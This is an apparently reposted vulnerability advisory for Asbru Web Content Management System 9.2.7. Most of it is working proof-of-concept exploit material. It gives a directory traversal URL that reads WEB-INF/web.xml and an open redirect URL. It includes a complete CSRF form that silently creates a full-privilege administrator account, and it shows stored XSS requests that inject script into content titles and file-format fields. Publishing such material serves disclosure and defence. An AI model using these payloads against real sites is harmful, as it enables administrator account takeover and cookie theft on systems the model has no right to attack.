Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

2016.04.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities Vendor: Asbru Ltd. Product web page: http://www.asbrusoft.com Affected version: 9.2.7 Summary: Ready to use, full-featured, database-driven web content management system (CMS) with integrated community, databases, e-commerce and statistics modules for creating, publishing and managing rich and user-friendly Internet, Extranet and Intranet websites. Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure. Tested on : Apache Tomcat/5.5.23 Apache/2.2.3 (CentOS) Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5314 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php 09.03.2016 -- #1 Directory Traversal: -------------------- http://10.0.0.7/../../../../../WEB-INF/web.xml #2 Open Redirect: -------------- http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk #3 Cross-Site Request Forgery (Add 'administrator' With Full Privileges): ---------------------------------------------------------------------- <html> <body> <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST"> <input type="hidden" name="userinfo" value="&#13;&#10;&lt;TEST&gt;&lt;&#47;TEST&gt;&#13;&#10;" /> <input type="hidden" name="title" value="Mr" /> <input type="hidden" name="name" value="Chekmidash" /> <input type="hidden" name="organisation" value="ZSL" /> <input type="hidden" name="email" value="test&#64;testingus&#46;io" /> <input type="hidden" name="gender" value="1" /> <input type="hidden" name="birthdate" value="1984&#45;01&#45;01" /> <input type="hidden" name="birthday" value="01" /> <input type="hidden" name="birthmonth" value="01" /> <input type="hidden" name="birthyear" value="1984" /> <input type="hidden" name="notes" value="CSRFNote" /> <input type="hidden" name="userinfo1" value="" /> <input type="hidden" name="userinfoname" value="" /> <input type="hidden" name="username" value="hackedusername" /> <input type="hidden" name="password" value="password123" /> <input type="hidden" name="userclass" value="administrator" /> <input type="hidden" name="usergroup" value="" /> <input type="hidden" name="usertype" value="" /> <input type="hidden" name="usergroups" value="Account&#32;Managers" /> <input type="hidden" name="usergroups" value="Company&#32;Bloggers" /> <input type="hidden" name="usergroups" value="Customer" /> <input type="hidden" name="usergroups" value="Event&#32;Managers" /> <input type="hidden" name="usergroups" value="Financial&#32;Officers" /> <input type="hidden" name="usergroups" value="Forum&#32;Moderator" /> <input type="hidden" name="usergroups" value="Human&#32;Resources" /> <input type="hidden" name="usergroups" value="Intranet&#32;Managers" /> <input type="hidden" name="usergroups" value="Intranet&#32;Users" /> <input type="hidden" name="usergroups" value="Newsletter" /> <input type="hidden" name="usergroups" value="Press&#32;Officers" /> <input type="hidden" name="usergroups" value="Product&#32;Managers" /> <input type="hidden" name="usergroups" value="Registered&#32;Users" /> <input type="hidden" name="usergroups" value="Shop&#32;Managers" /> <input type="hidden" name="usergroups" value="Subscribers" /> <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" /> <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" /> <input type="hidden" name="usergroups" value="User&#32;Managers" /> <input type="hidden" name="usergroups" value="Website&#32;Administrators" /> <input type="hidden" name="usergroups" value="Website&#32;Developers" /> <input type="hidden" name="users&#95;group" value="" /> <input type="hidden" name="users&#95;type" value="" /> <input type="hidden" name="creators&#95;group" value="" /> <input type="hidden" name="creators&#95;type" value="" /> <input type="hidden" name="editors&#95;group" value="" /> <input type="hidden" name="editors&#95;type" value="" /> <input type="hidden" name="publishers&#95;group" value="" /> <input type="hidden" name="publishers&#95;type" value="" /> <input type="hidden" name="administrators&#95;group" value="" /> <input type="hidden" name="administrators&#95;type" value="" /> <input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" /> <input type="hidden" name="scheduled&#95;publish&#95;email" value="" /> <input type="hidden" name="scheduled&#95;notify" value="" /> <input type="hidden" name="scheduled&#95;notify&#95;email" value="" /> <input type="hidden" name="scheduled&#95;unpublish" value="" /> <input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" /> <input type="hidden" name="invoice&#95;name" value="Icebreaker" /> <input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" /> <input type="hidden" name="invoice&#95;address" value="nu" /> <input type="hidden" name="invoice&#95;postalcode" value="1300" /> <input type="hidden" name="invoice&#95;city" value="Neverland" /> <input type="hidden" name="invoice&#95;state" value="ND" /> <input type="hidden" name="invoice&#95;country" value="ND" /> <input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" /> <input type="hidden" name="invoice&#95;fax" value="" /> <input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" /> <input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" /> <input type="hidden" name="delivery&#95;name" value="" /> <input type="hidden" name="delivery&#95;organisation" value="" /> <input type="hidden" name="delivery&#95;address" value="" /> <input type="hidden" name="delivery&#95;postalcode" value="" /> <input type="hidden" name="delivery&#95;city" value="" /> <input type="hidden" name="delivery&#95;state" value="" /> <input type="hidden" name="delivery&#95;country" value="" /> <input type="hidden" name="delivery&#95;phone" value="" /> <input type="hidden" name="delivery&#95;fax" value="" /> <input type="hidden" name="delivery&#95;email" value="" /> <input type="hidden" name="delivery&#95;website" value="" /> <input type="hidden" name="card&#95;type" value="VISA" /> <input type="hidden" name="card&#95;number" value="4444333322221111" /> <input type="hidden" name="card&#95;issuedmonth" value="01" /> <input type="hidden" name="card&#95;issuedyear" value="2016" /> <input type="hidden" name="card&#95;expirymonth" value="01" /> <input type="hidden" name="card&#95;expiryyear" value="2100" /> <input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" /> <input type="hidden" name="card&#95;cvc" value="133" /> <input type="hidden" name="card&#95;issue" value="" /> <input type="hidden" name="card&#95;postalcode" value="1300" /> <input type="hidden" name="content&#95;editor" value="" /> <input type="hidden" name="hardcore&#95;upload" value="" /> <input type="hidden" name="hardcore&#95;format" value="" /> <input type="hidden" name="hardcore&#95;width" value="" /> <input type="hidden" name="hardcore&#95;height" value="" /> <input type="hidden" name="hardcore&#95;onenter" value="" /> <input type="hidden" name="hardcore&#95;onctrlenter" value="" /> <input type="hidden" name="hardcore&#95;onshiftenter" value="" /> <input type="hidden" name="hardcore&#95;onaltenter" value="" /> <input type="hidden" name="hardcore&#95;toolbar1" value="" /> <input type="hidden" name="hardcore&#95;toolbar2" value="" /> <input type="hidden" name="hardcore&#95;toolbar3" value="" /> <input type="hidden" name="hardcore&#95;toolbar4" value="" /> <input type="hidden" name="hardcore&#95;toolbar5" value="" /> <input type="hidden" name="hardcore&#95;formatblock" value="" /> <input type="hidden" name="hardcore&#95;fontname" value="" /> <input type="hidden" name="hardcore&#95;fontsize" value="" /> <input type="hidden" name="hardcore&#95;customscript" value="" /> <input type="hidden" name="startpage" value="" /> <input type="hidden" name="workspace&#95;sections" value="" /> <input type="hidden" name="index&#95;workspace" value="" /> <input type="hidden" name="index&#95;content" value="" /> <input type="hidden" name="index&#95;library" value="" /> <input type="hidden" name="index&#95;product" value="" /> <input type="hidden" name="index&#95;stock" value="" /> <input type="hidden" name="index&#95;order" value="" /> <input type="hidden" name="index&#95;segments" value="" /> <input type="hidden" name="index&#95;usertests" value="" /> <input type="hidden" name="index&#95;heatmaps" value="" /> <input type="hidden" name="index&#95;user" value="" /> <input type="hidden" name="index&#95;websites" value="" /> <input type="hidden" name="menu&#95;selection" value="" /> <input type="hidden" name="statistics&#95;reports" value="" /> <input type="hidden" name="sales&#95;reports" value="" /> <input type="submit" value="Initiate" /> </form> </body> </html> #4 Stored Cross-Site Scripting: ---------------------------- a) POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1 Host: 10.0.0.7 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="webeditor_stylesheet" /stylesheet.jsp?id=1,1&device=&useragent=& ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="restore" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="archive" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publish" Save & Publish ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="scheduled_publish" 2016-03-09 13:29 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="scheduled_unpublish" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="checkedout" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="revision" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="title" "><script>alert(document.cookie)</script> ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="searchable" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="menuitem" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="file"; filename="test.svg" Content-Type: image/svg+xml testsvgxxefailed ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="file_data" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="server_filename" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentdelivery" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image1" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image2" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="image3" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="metainfo" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentation" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="author" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="description" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="keywords" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="metainfoname" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentationname" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="segmentationvalue" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentpackage" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentclass" image ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contentgroup" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="contenttype" Photos ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="version_master" 0 ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="version" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="device" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="usersegment" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="usertest" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="users_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="creators_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="editors_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="publishers_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="developers_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_group" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_type" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="administrators_users" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_top" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_up" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_previous" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_next" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_first" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="page_last" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="related" ------WebKitFormBoundarygqlN2AtccVFqx0YN Content-Disposition: form-data; name="selectrelated" ------WebKitFormBoundarygqlN2AtccVFqx0YN-- b) POST /webadmin/fileformats/create_post.jsp HTTP/1.1 Host: 10.0.0.7 filenameextension="><script>alert(document.cookie)</script>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top